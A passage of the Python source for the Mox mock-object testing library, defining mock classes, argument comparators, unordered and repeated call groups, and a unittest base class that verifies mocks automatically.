Suggested usage / workflow:
# Create Mox factory
my_mox = Mox()
# Create a mock data access object
mock_dao = my_mox.CreateMock(DAOClass)
# Set up expected behavior
mock_dao.RetrievePersonWithIdentifier('1').AndReturn(person)
mock_dao.DeletePerson(person)
# Put mocks in replay mode
my_mox.ReplayAll()
# Inject mock object and run test
controller.SetDao(mock_dao)
controller.DeletePersonById('1')
# Verify all methods were called as expected
my_mox.VerifyAll()
"""
from collections import deque
import re
import types
import unittest
import stubout
class Error(AssertionError):
"""Base exception for this module."""
pass
class ExpectedMethodCallsError(Error):
"""Raised when Verify() is called before all expected methods have been called
"""
def __init__(self, expected_methods):
"""Init exception.
Args:
# expected_methods: A sequence of MockMethod objects that should have been
# called.
expected_methods: [MockMethod]
Raises:
ValueError: if expected_methods contains no methods.
"""
if not expected_methods:
raise ValueError("There must be at least one expected method")
Error.__init__(self)
self._expected_methods = expected_methods
def __str__(self):
calls = "\n".join(["%3d. %s" % (i, m)
for i, m in enumerate(self._expected_methods)])
return "Verify: Expected methods never called:\n%s" % (calls,)
class UnexpectedMethodCallError(Error):
"""Raised when an unexpected method is called.
This can occur if a method is called with incorrect parameters, or out of the
specified order.
"""
def __init__(self, unexpected_method, expected):
"""Init exception.
Args:
# unexpected_method: MockMethod that was called but was not at the head of
# the expected_method queue.
# expected: MockMethod or UnorderedGroup the method should have
# been in.
unexpected_method: MockMethod
expected: MockMethod or UnorderedGroup
"""
Error.__init__(self)
self._unexpected_method = unexpected_method
self._expected = expected
def __str__(self):
return "Unexpected method call: %s. Expecting: %s" % \
(self._unexpected_method, self._expected)
class UnknownMethodCallError(Error):
"""Raised if an unknown method is requested of the mock object."""
def __init__(self, unknown_method_name):
"""Init exception.
Args:
# unknown_method_name: Method call that is not part of the mocked class's
# public interface.
unknown_method_name: str
"""
Error.__init__(self)
self._unknown_method_name = unknown_method_name
def __str__(self):
return "Method called is not a member of the object: %s" % \
self._unknown_method_name
class Mox(object):
"""Mox: a factory for creating mock objects."""
# A list of types that should be stubbed out with MockObjects (as
# opposed to MockAnythings).
_USE_MOCK_OBJECT = [types.ClassType, types.InstanceType, types.ModuleType,
types.ObjectType, types.TypeType]
def __init__(self):
"""Initialize a new Mox."""
self._mock_objects = []
self.stubs = stubout.StubOutForTesting()
def CreateMock(self, class_to_mock):
"""Create a new mock object.
Args:
# class_to_mock: the class to be mocked
class_to_mock: class
Returns:
MockObject that can be used as the class_to_mock would be.
"""
new_mock = MockObject(class_to_mock)
self._mock_objects.append(new_mock)
return new_mock
def CreateMockAnything(self):
"""Create a mock that will accept any method calls.
This does not enforce an interface.
"""
new_mock = MockAnything()
self._mock_objects.append(new_mock)
return new_mock
def ReplayAll(self):
"""Set all mock objects to replay mode."""
for mock_obj in self._mock_objects:
mock_obj._Replay()
def VerifyAll(self):
"""Call verify on all mock objects created."""
for mock_obj in self._mock_objects:
mock_obj._Verify()
def ResetAll(self):
"""Call reset on all mock objects. This does not unset stubs."""
for mock_obj in self._mock_objects:
mock_obj._Reset()
def StubOutWithMock(self, obj, attr_name, use_mock_anything=False):
"""Replace a method, attribute, etc. with a Mock.
This will replace a class or module with a MockObject, and everything else
(method, function, etc) with a MockAnything. This can be overridden to
always use a MockAnything by setting use_mock_anything to True.
Args:
obj: A Python object (class, module, instance, callable).
attr_name: str. The name of the attribute to replace with a mock.
use_mock_anything: bool. True if a MockAnything should be used regardless
of the type of attribute.
"""
attr_to_replace = getattr(obj, attr_name)
if type(attr_to_replace) in self._USE_MOCK_OBJECT and not use_mock_anything:
stub = self.CreateMock(attr_to_replace)
else:
stub = self.CreateMockAnything()
self.stubs.Set(obj, attr_name, stub)
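  # Illustrative sketch (not part of the API), assuming a hypothetical
  # module `time_util` whose Now() function the code under test calls:
  #
  #   m = Mox()
  #   m.StubOutWithMock(time_util, 'Now')
  #   time_util.Now().AndReturn(1234567890)
  #   m.ReplayAll()
  #   ...run the code under test...
  #   m.VerifyAll()
  #   m.UnsetStubs()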
def UnsetStubs(self):
"""Restore stubs to their original state."""
self.stubs.UnsetAll()
def Replay(*args):
"""Put mocks into Replay mode.
Args:
# args is any number of mocks to put into replay mode.
"""
for mock in args:
mock._Replay()
def Verify(*args):
"""Verify mocks.
Args:
# args is any number of mocks to be verified.
"""
for mock in args:
mock._Verify()
def Reset(*args):
"""Reset mocks.
Args:
# args is any number of mocks to be reset.
"""
for mock in args:
mock._Reset()
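# Illustrative sketch (not part of the module), showing the module-level
# helpers on a mock created without a Mox factory:
#
#   mock_obj = MockAnything()
#   mock_obj.Foo().AndReturn(1)
#   Replay(mock_obj)     # equivalent to mock_obj._Replay()
#   assert mock_obj.Foo() == 1
#   Verify(mock_obj)     # raises if expected calls remain
#   Reset(mock_obj)      # back to record mode with an empty queue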
class MockAnything:
"""A mock that can be used to mock anything.
This is helpful for mocking classes that do not provide a public interface.
"""
def __init__(self):
""" """
self._Reset()
def __getattr__(self, method_name):
"""Intercept method calls on this object.
A new MockMethod is returned that is aware of the MockAnything's
state (record or replay). The call will be recorded or replayed
by the MockMethod's __call__.
Args:
      # method_name: the name of the method being called.
method_name: str
Returns:
A new MockMethod aware of MockAnything's state (record or replay).
"""
return self._CreateMockMethod(method_name)
def _CreateMockMethod(self, method_name):
"""Create a new mock method call and return it.
Args:
      # method_name: the name of the method being called.
method_name: str
Returns:
A new MockMethod aware of MockAnything's state (record or replay).
"""
return MockMethod(method_name, self._expected_calls_queue,
self._replay_mode)
def __nonzero__(self):
"""Return 1 for nonzero so the mock can be used as a conditional."""
return 1
def __eq__(self, rhs):
"""Provide custom logic to compare objects."""
return (isinstance(rhs, MockAnything) and
self._replay_mode == rhs._replay_mode and
self._expected_calls_queue == rhs._expected_calls_queue)
def __ne__(self, rhs):
"""Provide custom logic to compare objects."""
return not self == rhs
def _Replay(self):
"""Start replaying expected method calls."""
self._replay_mode = True
def _Verify(self):
"""Verify that all of the expected calls have been made.
Raises:
ExpectedMethodCallsError: if there are still more method calls in the
expected queue.
"""
# If the list of expected calls is not empty, raise an exception
if self._expected_calls_queue:
# The last MultipleTimesGroup is not popped from the queue.
if (len(self._expected_calls_queue) == 1 and
isinstance(self._expected_calls_queue[0], MultipleTimesGroup) and
self._expected_calls_queue[0].IsSatisfied()):
pass
else:
raise ExpectedMethodCallsError(self._expected_calls_queue)
def _Reset(self):
"""Reset the state of this mock to record mode with an empty queue."""
# Maintain a list of method calls we are expecting
self._expected_calls_queue = deque()
# Make sure we are in setup mode, not replay mode
self._replay_mode = False
class MockObject(MockAnything, object):
"""A mock object that simulates the public/protected interface of a class."""
def __init__(self, class_to_mock):
"""Initialize a mock object.
This determines the methods and properties of the class and stores them.
Args:
# class_to_mock: class to be mocked
class_to_mock: class
"""
# This is used to hack around the mixin/inheritance of MockAnything, which
# is not a proper object (it can be anything. :-)
MockAnything.__dict__['__init__'](self)
# Get a list of all the public and special methods we should mock.
self._known_methods = set()
self._known_vars = set()
self._class_to_mock = class_to_mock
for method in dir(class_to_mock):
if callable(getattr(class_to_mock, method)):
self._known_methods.add(method)
else:
self._known_vars.add(method)
def __getattr__(self, name):
"""Intercept attribute request on this object.
If the attribute is a public class variable, it will be returned and not
recorded as a call.
If the attribute is not a variable, it is handled like a method
call. The method name is checked against the set of mockable
methods, and a new MockMethod is returned that is aware of the
MockObject's state (record or replay). The call will be recorded
or replayed by the MockMethod's __call__.
Args:
# name: the name of the attribute being requested.
name: str
Returns:
Either a class variable or a new MockMethod that is aware of the state
of the mock (record or replay).
Raises:
UnknownMethodCallError if the MockObject does not mock the requested
method.
"""
if name in self._known_vars:
return getattr(self._class_to_mock, name)
if name in self._known_methods:
return self._CreateMockMethod(name)
raise UnknownMethodCallError(name)
def __eq__(self, rhs):
"""Provide custom logic to compare objects."""
return (isinstance(rhs, MockObject) and
self._class_to_mock == rhs._class_to_mock and
self._replay_mode == rhs._replay_mode and
self._expected_calls_queue == rhs._expected_calls_queue)
def __setitem__(self, key, value):
"""Provide custom logic for mocking classes that support item assignment.
Args:
key: Key to set the value for.
value: Value to set.
Returns:
Expected return value in replay mode. A MockMethod object for the
__setitem__ method that has already been called if not in replay mode.
Raises:
TypeError if the underlying class does not support item assignment.
UnexpectedMethodCallError if the object does not expect the call to
__setitem__.
"""
setitem = self._class_to_mock.__dict__.get('__setitem__', None)
# Verify the class supports item assignment.
if setitem is None:
raise TypeError('object does not support item assignment')
# If we are in replay mode then simply call the mock __setitem__ method.
if self._replay_mode:
return MockMethod('__setitem__', self._expected_calls_queue,
self._replay_mode)(key, value)
# Otherwise, create a mock method __setitem__.
return self._CreateMockMethod('__setitem__')(key, value)
def __getitem__(self, key):
"""Provide custom logic for mocking classes that are subscriptable.
Args:
key: Key to return the value for.
Returns:
Expected return value in replay mode. A MockMethod object for the
__getitem__ method that has already been called if not in replay mode.
Raises:
TypeError if the underlying class is not subscriptable.
UnexpectedMethodCallError if the object does not expect the call to
        __getitem__.
"""
getitem = self._class_to_mock.__dict__.get('__getitem__', None)
    # Verify the class is subscriptable.
if getitem is None:
raise TypeError('unsubscriptable object')
# If we are in replay mode then simply call the mock __getitem__ method.
if self._replay_mode:
return MockMethod('__getitem__', self._expected_calls_queue,
self._replay_mode)(key)
# Otherwise, create a mock method __getitem__.
return self._CreateMockMethod('__getitem__')(key)
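  # Illustrative sketch, assuming a hypothetical dict-like class Cache that
  # defines __getitem__ and __setitem__:
  #
  #   mock_cache = my_mox.CreateMock(Cache)
  #   mock_cache['user:1'] = 'alice'             # records __setitem__
  #   mock_cache['user:1'].AndReturn('alice')    # records __getitem__
  #   my_mox.ReplayAll()
  #   ...code under test sets, then reads, the key...
  #   my_mox.VerifyAll()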
def __call__(self, *params, **named_params):
"""Provide custom logic for mocking classes that are callable."""
    # Verify the class we are mocking is callable. Avoid naming the local
    # `callable`, which would shadow the builtin.
    call_method = self._class_to_mock.__dict__.get('__call__', None)
    if call_method is None:
      raise TypeError('Not callable')
# Because the call is happening directly on this object instead of a method,
# the call on the mock method is made right here
mock_method = self._CreateMockMethod('__call__')
return mock_method(*params, **named_params)
@property
def __class__(self):
"""Return the class that is being mocked."""
return self._class_to_mock
class MockMethod(object):
"""Callable mock method.
A MockMethod should act exactly like the method it mocks, accepting parameters
and returning a value, or throwing an exception (as specified). When this
method is called, it can optionally verify whether the called method (name and
signature) matches the expected method.
"""
def __init__(self, method_name, call_queue, replay_mode):
"""Construct a new mock method.
Args:
# method_name: the name of the method
# call_queue: deque of calls, verify this call against the head, or add
# this call to the queue.
# replay_mode: False if we are recording, True if we are verifying calls
# against the call queue.
method_name: str
call_queue: list or deque
replay_mode: bool
"""
self._name = method_name
self._call_queue = call_queue
if not isinstance(call_queue, deque):
self._call_queue = deque(self._call_queue)
self._replay_mode = replay_mode
self._params = None
self._named_params = None
self._return_value = None
self._exception = None
self._side_effects = None
def __call__(self, *params, **named_params):
"""Log parameters and return the specified return value.
If the Mock(Anything/Object) associated with this call is in record mode,
this MockMethod will be pushed onto the expected call queue. If the mock
is in replay mode, this will pop a MockMethod off the top of the queue and
verify this call is equal to the expected call.
Raises:
UnexpectedMethodCall if this call is supposed to match an expected method
call and it does not.
"""
self._params = params
self._named_params = named_params
if not self._replay_mode:
self._call_queue.append(self)
return self
expected_method = self._VerifyMethodCall()
if expected_method._side_effects:
expected_method._side_effects(*params, **named_params)
if expected_method._exception:
raise expected_method._exception
return expected_method._return_value
def __getattr__(self, name):
"""Raise an AttributeError with a helpful message."""
raise AttributeError('MockMethod has no attribute "%s". '
'Did you remember to put your mocks in replay mode?' % name)
def _PopNextMethod(self):
"""Pop the next method from our call queue."""
try:
return self._call_queue.popleft()
except IndexError:
raise UnexpectedMethodCallError(self, None)
def _VerifyMethodCall(self):
"""Verify the called method is expected.
This can be an ordered method, or part of an unordered set.
Returns:
The expected mock method.
Raises:
UnexpectedMethodCall if the method called was not expected.
"""
expected = self._PopNextMethod()
# Loop here, because we might have a MethodGroup followed by another
# group.
while isinstance(expected, MethodGroup):
expected, method = expected.MethodCalled(self)
if method is not None:
return method
# This is a mock method, so just check equality.
if expected != self:
raise UnexpectedMethodCallError(self, expected)
return expected
def __str__(self):
params = ', '.join(
[repr(p) for p in self._params or []] +
['%s=%r' % x for x in sorted((self._named_params or {}).items())])
desc = "%s(%s) -> %r" % (self._name, params, self._return_value)
return desc
def __eq__(self, rhs):
"""Test whether this MockMethod is equivalent to another MockMethod.
Args:
# rhs: the right hand side of the test
rhs: MockMethod
"""
return (isinstance(rhs, MockMethod) and
self._name == rhs._name and
self._params == rhs._params and
self._named_params == rhs._named_params)
def __ne__(self, rhs):
"""Test whether this MockMethod is not equivalent to another MockMethod.
Args:
# rhs: the right hand side of the test
rhs: MockMethod
"""
return not self == rhs
def GetPossibleGroup(self):
"""Returns a possible group from the end of the call queue or None if no
    other methods are in the queue.
"""
# Remove this method from the tail of the queue so we can add it to a group.
this_method = self._call_queue.pop()
assert this_method == self
# Determine if the tail of the queue is a group, or just a regular ordered
# mock method.
group = None
try:
group = self._call_queue[-1]
except IndexError:
pass
return group
def _CheckAndCreateNewGroup(self, group_name, group_class):
"""Checks if the last method (a possible group) is an instance of our
group_class. Adds the current method to this group or creates a new one.
Args:
group_name: the name of the group.
group_class: the class used to create instance of this new group
"""
group = self.GetPossibleGroup()
# If this is a group, and it is the correct group, add the method.
if isinstance(group, group_class) and group.group_name() == group_name:
group.AddMethod(self)
return self
# Create a new group and add the method.
new_group = group_class(group_name)
new_group.AddMethod(self)
self._call_queue.append(new_group)
return self
def InAnyOrder(self, group_name="default"):
"""Move this method into a group of unordered calls.
A group of unordered calls must be defined together, and must be executed
in full before the next expected method can be called. There can be
multiple groups that are expected serially, if they are given
different group names. The same group name can be reused if there is a
standard method call, or a group with a different name, spliced between
usages.
Args:
group_name: the name of the unordered group.
Returns:
self
"""
return self._CheckAndCreateNewGroup(group_name, UnorderedGroup)
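  # Illustrative sketch, assuming a hypothetical mock_dao in record mode:
  #
  #   mock_dao.Insert(1).InAnyOrder()
  #   mock_dao.Insert(2).InAnyOrder()
  #   my_mox.ReplayAll()
  #   mock_dao.Insert(2)   # order within the group is not enforced
  #   mock_dao.Insert(1)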
def MultipleTimes(self, group_name="default"):
"""Move this method into group of calls which may be called multiple times.
A group of repeating calls must be defined together, and must be executed in
    full before the next expected method can be called.
Args:
group_name: the name of the unordered group.
Returns:
self
"""
return self._CheckAndCreateNewGroup(group_name, MultipleTimesGroup)
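  # Illustrative sketch, assuming a hypothetical mock_log in record mode:
  #
  #   mock_log.Write(IsA(str)).MultipleTimes()
  #   my_mox.ReplayAll()
  #   mock_log.Write('a')   # any number of matching calls >= 1 verifies
  #   mock_log.Write('b')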
def AndReturn(self, return_value):
"""Set the value to return when this method is called.
Args:
# return_value can be anything.
"""
self._return_value = return_value
return return_value
def AndRaise(self, exception):
"""Set the exception to raise when this method is called.
Args:
# exception: the exception to raise when this method is called.
exception: Exception
"""
self._exception = exception
def WithSideEffects(self, side_effects):
"""Set the side effects that are simulated when this method is called.
Args:
side_effects: A callable which modifies the parameters or other relevant
state which a given test case depends on.
Returns:
Self for chaining with AndReturn and AndRaise.
"""
self._side_effects = side_effects
return self
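  # Illustrative sketch: WithSideEffects returns self, so it chains with
  # AndReturn and AndRaise. mock_conn and the _record helper are hypothetical:
  #
  #   seen = []
  #   def _record(query):
  #     seen.append(query)   # capture the argument for later assertions
  #   mock_conn.Run('q').WithSideEffects(_record).AndReturn('rows')
  #   mock_conn.Run('bad').AndRaise(IOError('boom'))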
class Comparator:
"""Base class for all Mox comparators.
A Comparator can be used as a parameter to a mocked method when the exact
value is not known. For example, the code you are testing might build up a
long SQL string that is passed to your mock DAO. You're only interested that
the IN clause contains the proper primary keys, so you can set your mock
up as follows:
mock_dao.RunQuery(StrContains('IN (1, 2, 4, 5)')).AndReturn(mock_result)
Now whatever query is passed in must contain the string 'IN (1, 2, 4, 5)'.
A Comparator may replace one or more parameters, for example:
# return at most 10 rows
mock_dao.RunQuery(StrContains('SELECT'), 10)
or
# Return some non-deterministic number of rows
mock_dao.RunQuery(StrContains('SELECT'), IsA(int))
"""
def equals(self, rhs):
"""Special equals method that all comparators must implement.
Args:
rhs: any python object
"""
    raise NotImplementedError('method must be implemented by a subclass.')
def __eq__(self, rhs):
return self.equals(rhs)
def __ne__(self, rhs):
return not self.equals(rhs)
class IsA(Comparator):
"""This class wraps a basic Python type or class. It is used to verify
that a parameter is of the given type or class.
Example:
mock_dao.Connect(IsA(DbConnectInfo))
"""
def __init__(self, class_name):
"""Initialize IsA
Args:
class_name: basic python type or a class
"""
self._class_name = class_name
def equals(self, rhs):
"""Check to see if the RHS is an instance of class_name.
Args:
# rhs: the right hand side of the test
rhs: object
Returns:
bool
"""
try:
return isinstance(rhs, self._class_name)
except TypeError:
# Check raw types if there was a type error. This is helpful for
# things like cStringIO.StringIO.
return type(rhs) == type(self._class_name)
def __repr__(self):
return str(self._class_name)
class IsAlmost(Comparator):
"""Comparison class used to check whether a parameter is nearly equal
to a given value. Generally useful for floating point numbers.
  Example:
    mock_dao.SetTimeout(IsAlmost(3.9))
"""
def __init__(self, float_value, places=7):
"""Initialize IsAlmost.
Args:
float_value: The value for making the comparison.
places: The number of decimal places to round to.
"""
self._float_value = float_value
self._places = places
def equals(self, rhs):
"""Check to see if RHS is almost equal to float_value
Args:
rhs: the value to compare to float_value
Returns:
bool
"""
try:
return round(rhs-self._float_value, self._places) == 0
except TypeError:
# This is probably because either float_value or rhs is not a number.
return False
def __repr__(self):
return str(self._float_value)
class StrContains(Comparator):
"""Comparison class used to check whether a substring exists in a
string parameter. This can be useful in mocking a database with SQL
passed in as a string parameter, for example.
Example:
mock_dao.RunQuery(StrContains('IN (1, 2, 4, 5)')).AndReturn(mock_result)
"""
def __init__(self, search_string):
"""Initialize.
Args:
# search_string: the string you are searching for
search_string: str
"""
self._search_string = search_string
def equals(self, rhs):
"""Check to see if the search_string is contained in the rhs string.
Args:
# rhs: the right hand side of the test
rhs: object
Returns:
bool
"""
try:
return rhs.find(self._search_string) > -1
except Exception:
return False
def __repr__(self):
return '<str containing \'%s\'>' % self._search_string
class Regex(Comparator):
"""Checks if a string matches a regular expression.
This uses a given regular expression to determine equality.
"""
def __init__(self, pattern, flags=0):
"""Initialize.
Args:
# pattern is the regular expression to search for
pattern: str
# flags passed to re.compile function as the second argument
flags: int
"""
self.regex = re.compile(pattern, flags=flags)
def equals(self, rhs):
"""Check to see if rhs matches regular expression pattern.
Returns:
bool
"""
return self.regex.search(rhs) is not None
def __repr__(self):
s = '<regular expression \'%s\'' % self.regex.pattern
if self.regex.flags:
s += ', flags=%d' % self.regex.flags
s += '>'
return s
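  # Illustrative sketch, assuming a hypothetical mock_dao:
  #
  #   mock_dao.RunQuery(Regex(r'^SELECT \d+ FROM users')).AndReturn(rows)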
class In(Comparator):
"""Checks whether an item (or key) is in a list (or dict) parameter.
Example:
mock_dao.GetUsersInfo(In('expectedUserName')).AndReturn(mock_result)
"""
def __init__(self, key):
"""Initialize.
Args:
      # key is anything that could be in a list or a key in a dict
"""
self._key = key
def equals(self, rhs):
"""Check to see whether key is in rhs.
Args:
rhs: dict
Returns:
bool
"""
return self._key in rhs
def __repr__(self):
return '<sequence or map containing \'%s\'>' % self._key
class ContainsKeyValue(Comparator):
"""Checks whether a key/value pair is in a dict parameter.
Example:
mock_dao.UpdateUsers(ContainsKeyValue('stevepm', stevepm_user_info))
"""
def __init__(self, key, value):
"""Initialize.
Args:
# key: a key in a dict
# value: the corresponding value
"""
self._key = key
self._value = value
def equals(self, rhs):
"""Check whether the given key/value pair is in the rhs dict.
Returns:
bool
"""
try:
return rhs[self._key] == self._value
except Exception:
return False
def __repr__(self):
return '<map containing the entry \'%s: %s\'>' % (self._key, self._value)
class SameElementsAs(Comparator):
"""Checks whether iterables contain the same elements (ignoring order).
Example:
    mock_dao.ProcessUsers(SameElementsAs(['stevepm', 'salomaki']))
"""
def __init__(self, expected_seq):
"""Initialize.
Args:
expected_seq: a sequence
"""
self._expected_seq = expected_seq
def equals(self, actual_seq):
"""Check to see whether actual_seq has same elements as expected_seq.
Args:
actual_seq: sequence
Returns:
bool
"""
try:
expected = dict([(element, None) for element in self._expected_seq])
actual = dict([(element, None) for element in actual_seq])
except TypeError:
# Fall back to slower list-compare if any of the objects are unhashable.
expected = list(self._expected_seq)
actual = list(actual_seq)
expected.sort()
actual.sort()
return expected == actual
def __repr__(self):
return '<sequence with same elements as \'%s\'>' % self._expected_seq
class And(Comparator):
"""Evaluates one or more Comparators on RHS and returns an AND of the results.
"""
def __init__(self, *args):
"""Initialize.
Args:
*args: One or more Comparator
"""
self._comparators = args
def equals(self, rhs):
"""Checks whether all Comparators are equal to rhs.
Args:
# rhs: can be anything
Returns:
bool
"""
for comparator in self._comparators:
if not comparator.equals(rhs):
return False
return True
def __repr__(self):
return '<AND %s>' % str(self._comparators)
class Or(Comparator):
"""Evaluates one or more Comparators on RHS and returns an OR of the results.
"""
def __init__(self, *args):
"""Initialize.
Args:
*args: One or more Mox comparators
"""
self._comparators = args
def equals(self, rhs):
"""Checks whether any Comparator is equal to rhs.
Args:
# rhs: can be anything
Returns:
bool
"""
for comparator in self._comparators:
if comparator.equals(rhs):
return True
return False
def __repr__(self):
return '<OR %s>' % str(self._comparators)
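  # Illustrative sketch: comparators nest, so compound checks read naturally.
  # mock_dao is hypothetical:
  #
  #   mock_dao.Fetch(And(IsA(str), StrContains('id=')))
  #   mock_dao.Fetch(Or(IsA(int), IsA(long)))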
class Func(Comparator):
"""Call a function that should verify the parameter passed in is correct.
You may need the ability to perform more advanced operations on the parameter
in order to validate it. You can use this to have a callable validate any
parameter. The callable should return either True or False.
Example:
def myParamValidator(param):
# Advanced logic here
return True
    mock_dao.DoSomething(Func(myParamValidator), True)
"""
def __init__(self, func):
"""Initialize.
Args:
func: callable that takes one parameter and returns a bool
"""
self._func = func
def equals(self, rhs):
"""Test whether rhs passes the function test.
rhs is passed into func.
Args:
rhs: any python object
Returns:
the result of func(rhs)
"""
return self._func(rhs)
def __repr__(self):
return str(self._func)
class IgnoreArg(Comparator):
"""Ignore an argument.
This can be used when we don't care about an argument of a method call.
Example:
# Check if CastMagic is called with 3 as first arg and 'disappear' as third.
mymock.CastMagic(3, IgnoreArg(), 'disappear')
"""
def equals(self, unused_rhs):
"""Ignores arguments and returns True.
Args:
unused_rhs: any python object
Returns:
always returns True
"""
return True
def __repr__(self):
return '<IgnoreArg>'
class MethodGroup(object):
"""Base class containing common behaviour for MethodGroups."""
def __init__(self, group_name):
self._group_name = group_name
def group_name(self):
return self._group_name
def __str__(self):
return '<%s "%s">' % (self.__class__.__name__, self._group_name)
def AddMethod(self, mock_method):
raise NotImplementedError
def MethodCalled(self, mock_method):
raise NotImplementedError
def IsSatisfied(self):
raise NotImplementedError
class UnorderedGroup(MethodGroup):
"""UnorderedGroup holds a set of method calls that may occur in any order.
This construct is helpful for non-deterministic events, such as iterating
over the keys of a dict.
"""
def __init__(self, group_name):
super(UnorderedGroup, self).__init__(group_name)
self._methods = []
def AddMethod(self, mock_method):
"""Add a method to this group.
Args:
mock_method: A mock method to be added to this group.
"""
self._methods.append(mock_method)
def MethodCalled(self, mock_method):
"""Remove a method call from the group.
If the method is not in the set, an UnexpectedMethodCallError will be
raised.
Args:
mock_method: a mock method that should be equal to a method in the group.
Returns:
The mock method from the group
Raises:
UnexpectedMethodCallError if the mock_method was not in the group.
"""
# Check to see if this method exists, and if so, remove it from the set
# and return it.
for method in self._methods:
if method == mock_method:
# Remove the called mock_method instead of the method in the group.
# The called method will match any comparators when equality is checked
# during removal. The method in the group could pass a comparator to
# another comparator during the equality check.
self._methods.remove(mock_method)
# If this group is not empty, put it back at the head of the queue.
if not self.IsSatisfied():
mock_method._call_queue.appendleft(self)
return self, method
raise UnexpectedMethodCallError(mock_method, self)
def IsSatisfied(self):
"""Return True if there are not any methods in this group."""
return len(self._methods) == 0
class MultipleTimesGroup(MethodGroup):
"""MultipleTimesGroup holds methods that may be called any number of times.
Note: Each method must be called at least once.
This is helpful, if you don't know or care how many times a method is called.
"""
def __init__(self, group_name):
super(MultipleTimesGroup, self).__init__(group_name)
self._methods = set()
self._methods_called = set()
def AddMethod(self, mock_method):
"""Add a method to this group.
Args:
mock_method: A mock method to be added to this group.
"""
self._methods.add(mock_method)
def MethodCalled(self, mock_method):
"""Remove a method call from the group.
If the method is not in the set, an UnexpectedMethodCallError will be
raised.
Args:
mock_method: a mock method that should be equal to a method in the group.
Returns:
The mock method from the group
Raises:
UnexpectedMethodCallError if the mock_method was not in the group.
"""
# Check to see if this method exists, and if so add it to the set of
# called methods.
for method in self._methods:
if method == mock_method:
self._methods_called.add(mock_method)
# Always put this group back on top of the queue, because we don't know
# when we are done.
mock_method._call_queue.appendleft(self)
return self, method
if self.IsSatisfied():
      next_method = mock_method._PopNextMethod()
return next_method, None
else:
raise UnexpectedMethodCallError(mock_method, self)
def IsSatisfied(self):
"""Return True if all methods in this group are called at least once."""
# NOTE(psycho): We can't use the simple set difference here because we want
# to match different parameters which are considered the same e.g. IsA(str)
# and some string. This solution is O(n^2) but n should be small.
tmp = self._methods.copy()
for called in self._methods_called:
for expected in tmp:
if called == expected:
tmp.remove(expected)
if not tmp:
return True
break
return False
class MoxMetaTestBase(type):
"""Metaclass to add mox cleanup and verification to every test.
As the mox unit testing class is being constructed (MoxTestBase or a
subclass), this metaclass will modify all test functions to call the
CleanUpMox method of the test class after they finish. This means that
unstubbing and verifying will happen for every test with no additional code,
and any failures will result in test failures as opposed to errors.
"""
def __init__(cls, name, bases, d):
type.__init__(cls, name, bases, d)
# also get all the attributes from the base classes to account
# for a case when test class is not the immediate child of MoxTestBase
for base in bases:
for attr_name in dir(base):
d[attr_name] = getattr(base, attr_name)
for func_name, func in d.items():
if func_name.startswith('test') and callable(func):
setattr(cls, func_name, MoxMetaTestBase.CleanUpTest(cls, func))
@staticmethod
def CleanUpTest(cls, func):
"""Adds Mox cleanup code to any MoxTestBase method.
Always unsets stubs after a test. Will verify all mocks for tests that
otherwise pass.
Args:
cls: MoxTestBase or subclass; the class whose test method we are altering.
func: method; the method of the MoxTestBase test class we wish to alter.
Returns:
The modified method.
"""
def new_method(self, *args, **kwargs):
mox_obj = getattr(self, 'mox', None)
cleanup_mox = False
if mox_obj and isinstance(mox_obj, Mox):
cleanup_mox = True
try:
func(self, *args, **kwargs)
finally:
if cleanup_mox:
mox_obj.UnsetStubs()
if cleanup_mox:
mox_obj.VerifyAll()
new_method.__name__ = func.__name__
new_method.__doc__ = func.__doc__
new_method.__module__ = func.__module__
return new_method
class MoxTestBase(unittest.TestCase):
"""Convenience test class to make stubbing easier.
Sets up a "mox" attribute which is an instance of Mox - any mox tests will
want this. Also automatically unsets any stubs and verifies that all mock
methods have been called at the end of each test, eliminating boilerplate
code.
"""
__metaclass__ = MoxMetaTestBase
def setUp(self):
self.mox = Mox()
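  # Illustrative sketch: a test case built on MoxTestBase. Unstubbing and
  # VerifyAll() happen automatically via MoxMetaTestBase; DAOClass is
  # hypothetical:
  #
  #   class DaoTest(MoxTestBase):
  #     def testDelete(self):
  #       dao = self.mox.CreateMock(DAOClass)
  #       dao.DeletePerson('1')
  #       self.mox.ReplayAll()
  #       dao.DeletePerson('1')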
| bsd-3-clause | 5,966,710,906,291,615,000 | 26.292648 | 80 | 0.660277 | false |